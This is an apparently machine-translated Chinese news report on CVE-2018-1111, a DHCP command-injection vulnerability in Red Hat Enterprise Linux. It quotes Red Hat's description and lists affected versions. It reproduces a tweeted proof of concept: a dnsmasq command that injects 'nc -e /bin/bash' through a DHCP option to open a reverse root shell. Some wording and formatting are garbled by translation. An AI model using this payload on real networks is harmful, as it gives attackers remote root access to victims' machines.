红帽公司宣布在其DHCP客户端上宣布了一个严重漏洞,虽然它没有响亮的名称,但确实有一个Tweetable概念验证。
这个被命名为CVE-2018-1111的红帽企业Linux和衍生DHCP客户端的命令注入漏洞是由Google员工Felix Wilhelm发现。
“CVE 2018年至1111年是影响红帽衍生物一个非常糟糕的DHCP root远程命令注入:https://access.redhat.com/security/vulnerabilities/3442151 ...。漏洞利用符合推文,所以你应该尽快补丁。“
在这里,是一则发自BarkınKılıç的Tweet,是个PoC:
#CVE -2018-1111 tweetable PoC :) dnsmasq --interface = eth0 --bind-interfaces --except-interface = lo --dhcp-range = 10.1.1.1,10.1.1.10,1h --conf-file = / dev / null --dhcp-option = 6,10.1.1.1 --dhcp-option = 3,10.1.1.1 --dhcp-option =“252,x'&nc -e / bin / bash 10.1.1.1 1337#”cc :@cnbrkbolat pic.twitter.com/vUICm2HluC - BarkınKılıç(@Barknkilic)2018年5月15日
(该Tweet中的第三张图片显示攻击者以root身份访问shell。)Red Hat解释说:“恶意的DHCP服务器或本地网络上能够欺骗DHCP响应的攻击者可以使用此漏洞执行任意命令使用NetworkManager并配置为使用DHCP协议获取网络配置的系统的root权限。“
以下是受影响的RHEL版本的完整列表:
Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2)。
Red Hat针对x86和IBM Power架构上SAP解决方案的更新服务也受到影响。
领取专属 10元无门槛券
私享最新 技术干货